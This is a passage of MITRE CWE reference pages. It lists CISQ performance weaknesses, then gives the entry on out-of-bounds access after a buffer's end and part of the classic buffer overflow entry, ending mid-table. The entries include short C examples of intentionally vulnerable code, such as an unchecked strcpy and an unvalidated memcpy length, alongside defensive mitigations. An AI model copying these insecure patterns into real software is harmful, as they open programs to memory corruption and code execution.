1128 (CISQ Quality Measures (2016)) > 1132 (CISQ Quality Measures (2016) - Performance Efficiency) > 1046 (Creation of Immutable Text Using String Concatenation)

The product creates an immutable text string using string concatenation operations.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Excessive Data Query Operations in a Large Data Table - (1049)

1128 (CISQ Quality Measures (2016)) > 1132 (CISQ Quality Measures (2016) - Performance Efficiency) > 1049 (Excessive Data Query Operations in a Large Data Table)

The product performs a data query with a large number of joins and sub-queries on a large data table.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Excessive Platform Resource Consumption within a Loop - (1050)

1128 (CISQ Quality Measures (2016)) > 1132 (CISQ Quality Measures (2016) - Performance Efficiency) > 1050 (Excessive Platform Resource Consumption within a Loop)

The product has a loop body or loop condition that contains a control element that directly or indirectly consumes platform resources, e.g. messaging, sessions, locks, or file descriptors.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Data Access Operations Outside of Expected Data Manager Component - (1057)

1128 (CISQ Quality Measures (2016)) > 1132 (CISQ Quality Measures (2016) - Performance Efficiency) > 1057 (Data Access Operations Outside of Expected Data Manager Component)

The product uses a dedicated, central data manager component as required by design, but it contains code that performs data-access operations that do not use this data manager.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Excessive Number of Inefficient Server-Side Data Accesses - (1060)

1128 (CISQ Quality Measures (2016)) > 1132 (CISQ Quality Measures (2016) - Performance Efficiency) > 1060 (Excessive Number of Inefficient Server-Side Data Accesses)

The product performs too many data queries without using efficient data processing functionality such as stored procedures.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Creation of Class Instance within a Static Code Block - (1063)

1128 (CISQ Quality Measures (2016)) > 1132 (CISQ Quality Measures (2016) - Performance Efficiency) > 1063 (Creation of Class Instance within a Static Code Block)

A static code block creates an instance of a class.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Excessive Execution of Sequential Searches of Data Resource - (1067)

1128 (CISQ Quality Measures (2016)) > 1132 (CISQ Quality Measures (2016) - Performance Efficiency) > 1067 (Excessive Execution of Sequential Searches of Data Resource)

The product contains a data query against an SQL table or view that is configured in a way that does not utilize an index and may cause sequential searches to be performed.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Data Resource Access without Use of Connection Pooling - (1072)

1128 (CISQ Quality Measures (2016)) > 1132 (CISQ Quality Measures (2016) - Performance Efficiency) > 1072 (Data Resource Access without Use of Connection Pooling)

The product accesses a data resource through a database without using a connection pooling capability.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Non-SQL Invokable Control Element with Excessive Number of Data Resource Accesses - (1073)

1128 (CISQ Quality Measures (2016)) > 1132 (CISQ Quality Measures (2016) - Performance Efficiency) > 1073 (Non-SQL Invokable Control Element with Excessive Number of Data Resource Accesses)

The product contains a client with a function or method that contains a large number of data accesses/queries that are sent through a data manager, i.e., does not use efficient database capabilities.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Large Data Table with Excessive Number of Indices - (1089)

1128 (CISQ Quality Measures (2016)) > 1132 (CISQ Quality Measures (2016) - Performance Efficiency) > 1089 (Large Data Table with Excessive Number of Indices)

The product uses a large data table that contains an excessively large number of indices.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Use of Object without Invoking Destructor Method - (1091)

1128 (CISQ Quality Measures (2016)) > 1132 (CISQ Quality Measures (2016) - Performance Efficiency) > 1091 (Use of Object without Invoking Destructor Method)

The product contains a method that accesses an object but does not later invoke the element's associated finalize/destructor method.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Excessive Index Range Scan for a Data Resource - (1094)

1128 (CISQ Quality Measures (2016)) > 1132 (CISQ Quality Measures (2016) - Performance Efficiency) > 1094 (Excessive Index Range Scan for a Data Resource)

The product contains an index range scan for a large data table, but the scan can cover a large number of rows.

Vulnerability Mapping Notes

Usage: PROHIBITED

(this CWE ID must not be used to map to real-world vulnerabilities)

Reason: View

Rationale:

This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities.

Comments:

Use this View or other Views to search and navigate for the appropriate weakness.

References

[REF-968] Consortium for Information & Software Quality (CISQ). "Automated Quality Characteristic Measures". 2016. <https://www.it-cisq.org/standards/automated-quality-characteristic-measures-maintainability/>. URL validated: 2025-08-04.

View Metrics

	CWEs in this view		Total CWEs
Weaknesses	77	out of	944
Categories	4	out of	385
Views	0	out of	54
Total	81	out of	1383

Content History

Submissions
Submission Date	Submitter	Organization
2018-07-23 (CWE 3.2, 2019-01-03)	CWE Content Team	MITRE
2018-07-23 (CWE 3.2, 2019-01-03)	View constructed using Common Quality Enumeration (CQE) draft 0.9, constructed using view 9001.
Modifications
Modification Date	Modifier	Organization
2020-02-24	CWE Content Team	MITRE
2020-02-24	updated Description, View_Audience
2020-06-25	CWE Content Team	MITRE
2020-06-25	updated References
2023-06-29	CWE Content Team	MITRE
2023-06-29	updated Mapping_Notes
2025-09-09 (CWE 4.18, 2025-09-09)	CWE Content Team	MITRE
2025-09-09 (CWE 4.18, 2025-09-09)	updated References

View Components

Weakness ID: 788

Vulnerability Mapping: DISCOURAGED This CWE ID should not be used to map to real-world vulnerabilities
Abstraction: Base Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.

View customized information:

For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers. For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts. For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers. For users who wish to see all available information for the CWE/CAPEC entry. For users who want to customize what details are displayed.

Description

The product reads or writes to a buffer using an index or pointer that references a memory location after the end of the buffer.

Extended Description

This typically occurs when a pointer or its index is incremented to a position after the buffer; or when pointer arithmetic results in a position after the buffer.

Common Consequences

This table specifies different individual consequences associated with the weakness. The Scope identifies the application security area that is violated, while the Impact describes the negative technical impact that arises if an adversary succeeds in exploiting this weakness. The Likelihood provides information about how likely the specific consequence is expected to be seen relative to the other consequences in the list. For example, there may be high likelihood that a weakness will be exploited to achieve a certain impact, but a low likelihood that it will be exploited to achieve a different impact.

Impact	Details
Read Memory	Scope: Confidentiality For an out-of-bounds read, the attacker may have access to sensitive information. If the sensitive information contains system details, such as the current buffer's position in memory, this knowledge can be used to craft further attacks, possibly with more severe consequences.
Modify Memory; DoS: Crash, Exit, or Restart	Scope: Integrity, Availability Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop.
Modify Memory; Execute Unauthorized Code or Commands	Scope: Integrity If the memory accessible by the attacker can be effectively controlled, it may be possible to execute arbitrary code, as with a standard buffer overflow. If the attacker can overwrite a pointer's worth of memory (usually 32 or 64 bits), they can redirect a function pointer to their own malicious code. Even when the attacker can only modify a single byte arbitrary code execution can be possible. Sometimes this is because the same problem can be exploited repeatedly to the same effect. Other times it is because the attacker can overwrite security-critical application-specific data -- such as a flag indicating whether the user is an administrator.

Relationships

This table shows the weaknesses and high level categories that are related to this weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to similar items that may exist at higher and lower levels of abstraction. In addition, relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user may want to explore.

Relevant to the view "Research Concepts" (View-1000)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	119	Improper Restriction of Operations within the Bounds of a Memory Buffer
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	121	Stack-based Buffer Overflow
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	122	Heap-based Buffer Overflow
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	126	Buffer Over-read

Relevant to the view "Software Development" (View-699)

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1218	Memory Buffer Errors

Relevant to the view "CISQ Quality Measures (2020)" (View-1305)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	119	Improper Restriction of Operations within the Bounds of a Memory Buffer

Relevant to the view "CISQ Data Protection Measures" (View-1340)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	119	Improper Restriction of Operations within the Bounds of a Memory Buffer

Modes Of Introduction

The different Modes of Introduction provide information about how and when this weakness may be introduced. The Phase identifies a point in the life cycle at which introduction may occur, while the Note provides a typical scenario related to introduction during the given phase.

Phase	Note
Implementation

Applicable Platforms

This listing shows possible areas for which the given weakness could appear. These may be for specific named Languages, Operating Systems, Architectures, Paradigms, Technologies, or a class of such platforms. The platform is listed along with how frequently the given weakness appears for that instance.

Languages

Class: Memory-Unsafe (Undetermined Prevalence)

C (Often Prevalent)

C++ (Often Prevalent)

Demonstrative Examples

Example 1

This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.

(bad code)

Example Language: C

void host_lookup(char *user_supplied_addr){

struct hostent *hp;
in_addr_t *addr;
char hostname[64];
in_addr_t inet_addr(const char *cp);

/*routine that ensures user_supplied_addr is in the right format for conversion */

validate_addr_form(user_supplied_addr);
addr = inet_addr(user_supplied_addr);
hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);
strcpy(hostname, hp->h_name);

}

This function allocates a buffer of 64 bytes to store the hostname, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker.

Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476).

Example 2

In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed:

(bad code)

Example Language: C

int returnChunkSize(void *) {

/* if chunk info is valid, return the size of usable memory,

* else, return -1 to indicate an error

*/
...

}
int main() {

...
memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));
...

}

If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788).

Example 3

This example applies an encoding procedure to an input string and stores it into a buffer.

(bad code)

Example Language: C

char * copy_input(char *user_supplied_string){

int i, dst_index;
char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);
if ( MAX_SIZE <= strlen(user_supplied_string) ){

die("user string too long, die evil hacker!");

}
dst_index = 0;
for ( i = 0; i < strlen(user_supplied_string); i++ ){

if( '&' == user_supplied_string[i] ){

dst_buf[dst_index++] = '&';
dst_buf[dst_index++] = 'a';
dst_buf[dst_index++] = 'm';
dst_buf[dst_index++] = 'p';
dst_buf[dst_index++] = ';';

}
else if ('<' == user_supplied_string[i] ){

/* encode to < */

}
else dst_buf[dst_index++] = user_supplied_string[i];

}
return dst_buf;

}

The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands.

Example 4

In the following C/C++ example the method processMessageFromSocket() will get a message from a socket, placed into a buffer, and will parse the contents of the buffer into a structure that contains the message length and the message body. A for loop is used to copy the message body into a local character string which will be passed to another method for processing.

(bad code)

Example Language: C

int processMessageFromSocket(int socket) {

int success;

char buffer[BUFFER_SIZE];
char message[MESSAGE_SIZE];

// get message from socket and store into buffer

//Ignoring possibliity that buffer > BUFFER_SIZE
if (getMessage(socket, buffer, BUFFER_SIZE) > 0) {

// place contents of the buffer into message structure
ExMessage *msg = recastBuffer(buffer);

// copy message body into string for processing
int index;
for (index = 0; index < msg->msgLength; index++) {

message[index] = msg->msgBody[index];

}
message[index] = '\0';

// process message
success = processMessage(message);

}
return success;

}

However, the message length variable (msgLength) from the structure is used as the condition for ending the for loop without validating that msgLength accurately reflects the actual length of the message body (CWE-606). If msgLength indicates a length that is longer than the size of a message body (CWE-130), then this can result in a buffer over-read by reading past the end of the buffer (CWE-126).

Selected Observed Examples

Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.

Reference	Description
CVE-2009-2550	Classic stack-based buffer overflow in media player using a long entry in a playlist
CVE-2009-2403	Heap-based buffer overflow in media player using a long entry in a playlist
CVE-2009-0689	large precision value in a format string triggers overflow
CVE-2009-0558	attacker-controlled array index leads to code execution
CVE-2008-4113	OS kernel trusts userland-supplied length value, allowing reading of sensitive information
CVE-2007-4268	Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122)

Weakness Ordinalities

Ordinality	Description
Resultant	(where the weakness is typically related to the presence of some other weaknesses)

Detection Methods

Method	Details
Fuzzing	Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. Effectiveness: High
Automated Static Analysis	Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) Effectiveness: High
Automated Dynamic Analysis	Use tools that are integrated during compilation to insert runtime error-checking mechanisms related to memory safety errors, such as AddressSanitizer (ASan) for C/C++ [REF-1518]. Effectiveness: Moderate Note:Crafted inputs are necessary to reach the code containing the error, such as generated by fuzzers. Also, these tools may reduce performance, and they only report the error condition - not the original mistake that led to the error.

Functional Areas

Memory Management

Affected Resources

Memory

Memberships

This MemberOf Relationships table shows additional CWE Categories and Views that reference this weakness as a member. This information is often useful in understanding where a weakness fits within the context of external information sources.

Nature	Type	ID	Name
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	884	CWE Cross-section
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1129	CISQ Quality Measures (2016) - Reliability
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1399	Comprehensive Categorization: Memory Safety

Vulnerability Mapping Notes

Usage	DISCOURAGED (this CWE ID should not be used to map to real-world vulnerabilities)
Reasons	Potential Deprecation, Frequent Misuse
Rationale	The CWE entry might be misused when lower-level CWE entries might be available. It also overlaps existing CWE entries and might be deprecated in the future.
Comments	If the "Access" operation is known to be a read or a write, then investigate children of entries such as CWE-787: Out-of-bounds Write and CWE-125: Out-of-bounds Read.

Taxonomy Mappings

Mapped Taxonomy Name	Node ID	Fit	Mapped Node Name
OMG ASCRM	ASCRM-CWE-788

References

[REF-961]	Object Management Group (OMG). "Automated Source Code Reliability Measure (ASCRM)". ASCRM-CWE-788. 2016-01. <http://www.omg.org/spec/ASCRM/1.0/>.
[REF-1518]	"AddressSanitizer". <https://clang.llvm.org/docs/AddressSanitizer.html>. (URL validated: 2025-12-10)

Content History

Submissions
Submission Date	Submitter	Organization
2009-10-21 (CWE 1.6, 2009-10-29)	CWE Content Team	MITRE
2009-10-21 (CWE 1.6, 2009-10-29)
Contributions
Contribution Date	Contributor	Organization
2022-02-23	Eric Constantin Brinz	GENIA-SEC IT-Sicherheitsmanagement GmbH
2022-02-23	Suggested corrections to extended description.
Modifications
Modification Date	Modifier	Organization
2025-12-11 (CWE 4.19, 2025-12-11)	CWE Content Team	MITRE
2025-12-11 (CWE 4.19, 2025-12-11)	updated Applicable_Platforms, Detection_Factors, References, Time_of_Introduction, Weakness_Ordinalities
2025-09-09 (CWE 4.18, 2025-09-09)	CWE Content Team	MITRE
2025-09-09 (CWE 4.18, 2025-09-09)	updated Affected_Resources, Demonstrative_Examples, Functional_Areas
2025-04-03 (CWE 4.17, 2025-04-03)	CWE Content Team	MITRE
2025-04-03 (CWE 4.17, 2025-04-03)	updated Applicable_Platforms
2024-07-16 (CWE 4.15, 2024-07-16)	CWE Content Team	MITRE
2024-07-16 (CWE 4.15, 2024-07-16)	updated Common_Consequences
2023-06-29	CWE Content Team	MITRE
2023-06-29	updated Mapping_Notes
2023-04-27	CWE Content Team	MITRE
2023-04-27	updated Detection_Factors, Relationships
2023-01-31	CWE Content Team	MITRE
2023-01-31	updated Description
2022-04-28	CWE Content Team	MITRE
2022-04-28	updated Description
2021-07-20	CWE Content Team	MITRE
2021-07-20	updated Demonstrative_Examples
2020-12-10	CWE Content Team	MITRE
2020-12-10	updated Relationships
2020-08-20	CWE Content Team	MITRE
2020-08-20	updated Relationships
2020-06-25	CWE Content Team	MITRE
2020-06-25	updated Demonstrative_Examples
2020-02-24	CWE Content Team	MITRE
2020-02-24	updated Relationships
2019-01-03	CWE Content Team	MITRE
2019-01-03	updated References, Relationships, Taxonomy_Mappings
2017-11-08	CWE Content Team	MITRE
2017-11-08	updated Common_Consequences, Demonstrative_Examples, Observed_Examples
2017-05-03	CWE Content Team	MITRE
2017-05-03	updated Description
2015-12-07	CWE Content Team	MITRE
2015-12-07	updated Description
2014-06-23	CWE Content Team	MITRE
2014-06-23	updated Demonstrative_Examples
2013-02-21	CWE Content Team	MITRE
2013-02-21	updated Demonstrative_Examples
2012-05-11	CWE Content Team	MITRE
2012-05-11	updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Relationships
2011-06-01	CWE Content Team	MITRE
2011-06-01	updated Common_Consequences

Weakness ID: 120

Vulnerability Mapping: ALLOWED This CWE ID could be used to map to real-world vulnerabilities in limited situations requiring careful review (with careful review of mapping notes)
Abstraction: Base Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.

View customized information:

Description

The product copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer.

Alternate Terms

Classic Buffer Overflow	This term was frequently used by vulnerability researchers during approximately 1995 to 2005 to differentiate buffer copies without length checks (which had been known about for decades) from other emerging weaknesses that still involved invalid accesses of buffers, as vulnerability researchers began to develop advanced exploitation techniques.
Unbounded Transfer

Common Consequences

Impact	Details
Modify Memory; Execute Unauthorized Code or Commands	Scope: Integrity, Confidentiality, Availability Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of the product's implicit security policy. This can often be used to subvert any other security service.
Modify Memory; DoS: Crash, Exit, or Restart; DoS: Resource Consumption (CPU)	Scope: Availability Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the product into an infinite loop.

Potential Mitigations

Phase(s)	Mitigation
Requirements	Strategy: Language Selection Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer. Be wary that a language's interface to native code may still be subject to overflows, even if the language itself is theoretically safe.
Architecture and Design	Strategy: Libraries or Frameworks Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. Examples include the Safe C String Library (SafeStr) by Messier and Viega [REF-57], and the Strsafe.h library from Microsoft [REF-56]. These libraries provide safer versions of overflow-prone string-handling functions. Note: This is not a complete solution, since many buffer overflows are not related to strings.
Operation; Build and Compilation	Strategy: Environment Hardening Use automatic buffer overflow detection mechanisms that are offered by certain compilers or compiler extensions. Examples include: the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice, which provide various mechanisms including canary-based detection and range/index checking. D3-SFCV (Stack Frame Canary Validation) from D3FEND [REF-1334] discusses canary-based detection in detail. Effectiveness: Defense in Depth Note: This is not necessarily a complete solution, since these mechanisms only detect certain types of overflows. In addition, the result is still a denial of service, since the typical response is to exit the application.
Implementation	Consider adhering to the following rules when allocating and managing an application's memory: Double check that your buffer is as large as you specify. When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string. Check buffer boundaries if accessing the buffer in a loop and make sure there is no danger of writing past the allocated space. If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions.
Implementation	Strategy: Input Validation Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
Architecture and Design	For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Operation; Build and Compilation	Strategy: Environment Hardening Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code. Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]. Imported modules may be similarly realigned if their default memory addresses conflict with other modules, in a process known as "rebasing" (for Windows) and "prelinking" (for Linux) [REF-1332] using randomly generated addresses. ASLR for libraries cannot be used in conjunction with prelink since it would require relocating the libraries at run-time, defeating the whole purpose of prelinking. For more information on these techniques see D3-SAOR (Segment Address Offset Randomization) from D3FEND [REF-1335]. Effectiveness: Defense in Depth Note: These techniques do not provide a complete solution. For instance, exploits frequently use a bug that discloses memory addresses in order to maximize reliability of code execution [REF-1337]. It has also been shown that a side-channel attack can bypass ASLR [REF-1333].
Operation	Strategy: Environment Hardening Use a CPU and operating system that offers Data Execution Protection (using hardware NX or XD bits) or the equivalent techniques that simulate this feature in software, such as PaX [REF-60] [REF-61]. These techniques ensure that any instruction executed is exclusively at a memory address that is part of the code segment. For more information on these techniques see D3-PSEP (Process Segment Execution Prevention) from D3FEND [REF-1336]. Effectiveness: Defense in Depth Note: This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software's state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application.
Build and Compilation; Operation	Most mitigating technologies at the compiler or OS level to date address only a subset of buffer overflow problems and rarely provide complete protection against even that subset. It is good practice to implement strategies to increase the workload of an attacker, such as leaving the attacker to guess an unknown value that changes every program execution.
Implementation	Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available. Effectiveness: Moderate Note: This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131).
Architecture and Design	Strategy: Enforcement by Conversion When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
Architecture and Design; Operation	Strategy: Environment Hardening Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.
Architecture and Design; Operation	Strategy: Sandbox or Jail Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails. Effectiveness: Limited Note: The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed.

Relationships

Relevant to the view "Research Concepts" (View-1000)

Nature	Type	ID	Name
ChildOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	787	Out-of-bounds Write
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	785	Use of Path Manipulation Function without Maximum-sized Buffer
CanFollow	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	170	Improper Null Termination
CanFollow	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	231	Improper Handling of Extra Values
CanFollow	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	416	Use After Free
CanFollow	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	456	Missing Initialization of a Variable
CanPrecede	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	123	Write-what-where Condition

Relevant to the view "Software Development" (View-699)

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1218	Memory Buffer Errors

Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	119	Improper Restriction of Operations within the Bounds of a Memory Buffer

Relevant to the view "CISQ Quality Measures (2020)" (View-1305)

Nature	Type	ID	Name
ChildOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	787	Out-of-bounds Write

Relevant to the view "CISQ Data Protection Measures" (View-1340)

Nature	Type	ID	Name
ChildOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	787	Out-of-bounds Write

Relevant to the view "Seven Pernicious Kingdoms" (View-700)

Nature	Type	ID	Name
